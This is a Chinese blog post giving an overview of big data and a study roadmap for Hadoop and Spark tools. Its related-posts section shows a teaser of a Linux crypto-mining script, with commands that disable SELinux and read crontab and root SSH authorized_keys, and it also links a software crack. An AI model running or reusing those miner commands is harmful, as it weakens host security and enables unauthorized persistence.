Java大数据学习01–大数据的本质及学习顺序介绍

Java大数据学习01–大数据的本质及学习顺序介绍随着互联网的使用人数越来越多,产生的数据也越来越多。根据数据我们可以分析出很多有用的信息。这也就是当前为什么大数据这么火的行为。学习大数据有很多种方式,但我们学习的载体是以目前最普遍,最流行的Java语言来进行学习。下面我们进入正题:1、首先是大数据的本质:大数据的本质无非两条:大数据的存储(Hadoop)和大数据的计算(Spark)存储:由于数据量巨大,把所有数据存在一个机器…

大家好,又见面了,我是你们的朋友全栈君。

随着互联网的使用人数越来越多,产生的数据也越来越多。根据数据我们可以分析出很多有用的信息。这也就是当前为什么大数据这么火的行为。

学习大数据有很多种方式,但我们学习的载体是以目前最普遍,最流行的Java语言来进行学习。

下面我们进入正题:

1、首先是大数据的本质:

大数据的本质无非两条:大数据的存储(Hadoop)和大数据的计算(Spark)

存储:由于数据量巨大,把所有数据存在一个机器中是不现实的,容量不够而且也不安全。所以必须要用分布式的文件系统来进行存储。

计算:使用分布式计算。

2、学习路线:

(1)Java基础和Linux基础
(2)Hadoop的学习:体系结构、原理、编程
    第一阶段:HDFS(分布式文件管理系统)、MapReduce(分布式运算编程框架)、Yarn(运算资源调度系统)、HBase(NoSQL数据库)
    第二阶段:数据分析引擎 —> Hive、Pig
              数据采集引擎 —> Sqoop(hadoop与传统数据库导入导出数据的接口:数据库中<==>HDFS)、Flume(日志收集工具:将大规模流数据导入HDFS)
    第三阶段:HUE:Web管理工具
              ZooKeeper:实现Hadoop的HA
              Oozie:工作流引擎
(3)Spark的学习
    第一个阶段:Scala编程语言
    第二个阶段:Spark Core—–> 基于内存,数据的计算
    第三个阶段:Spark SQL —–> 类似Oracle中的SQL语句
    第四个阶段:Spark Streaming —> 进行实时计算(流式计算):比如:自来水厂                
(4)Apache Storm:类似Spark Streaming —> 进行实时计算(流式计算):比如:自来水厂
     NoSQL:Redis基于内存的数据库

之后跟我一起来一点一滴认识和了解大数据的各种工具(Hadoop家族)

 

喜欢的朋友点个赞哦~~

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/140310.html原文链接:https://javaforall.net

(0)
全栈程序员-站长的头像全栈程序员-站长


相关推荐

  • 浅析ASP.NET的IIS映射

    浅析ASP.NET的IIS映射

    2021年8月6日
    71
  • Internet Download Manager IDM 激活成功教程器

    Internet Download Manager IDM 激活成功教程器IDM 全名 InternetDown 是一款国外的多线程下载神器 简称 IDM InternetDown 支持多媒体下载 自动捕获链接 自动识别文件名 静默下载 批量下载 计划下载任务 站点抓取 队列等等是一款国外的老牌下载工具 互联网下载管理器 IDM 是一种提高下载速度 5 倍 恢复和下载时间表的工具 全面的错误恢复和恢复功能将

    2025年10月29日
    5
  • LINUX 挖矿脚本newdat.sh

    LINUX 挖矿脚本newdat.sh#!/bin/shsetenforce02>dev/nullechoSELINUX=disabled>/etc/sysconfig/selinux2>/dev/nullsync&&echo3>/proc/sys/vm/drop_cachescrondir=’/var/spool/cron/'”$USER”cont=`cat${crondir}`ssht=`cat/root/.ssh/authorized_keys`echo1&

    2022年7月13日
    33
  • python 基尼系数_Python计算

    python 基尼系数_Python计算代码实现套用公式:defgini(a:int,b:int)->float:return1-pow(a/(a+b),2)-pow(b/(a+b),2)defgini_total(a:int,b:int,c:int,d:int)->float:return(a+b)/(a+b+c+d)*gini(a,b)+(c+d)/(a+b+c+d)*gini(c,d)print(gini(13,98))print(g

    2022年8月31日
    8
  • Python删除文件到回收站

    Python删除文件到回收站利用activepython里面的shell模块可以完成删除到回收站的操作,如下:fromwin32com.shellimportshell,shellcondefdeltorecyclebin(filename):   shell.SHFileOperation((0,shellcon.FO_DELETE,filename,None,/      shellc

    2022年5月30日
    39
  • 用ghost备份系统_手动运行ghost备份系统方法

    用ghost备份系统_手动运行ghost备份系统方法说到ghost备份系统,大家一定不会陌生,一键Ghost在XP时代可以说是装机必备,Ghost绝对是一把好手。下面就由小编来介绍最详细的ghost备份系统图解,有需要ghost备份系统的朋友可以参考小编的短文。以下就是ghost备份系统图文教程,希望可以帮到你。PS:很多朋友看完下面的Ghost备份步骤后,依然很迷惑,小编推荐电脑小白参考这个教程【】。ghost备份系统图文教程:1.1、运行Gho…

    2025年9月21日
    6

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号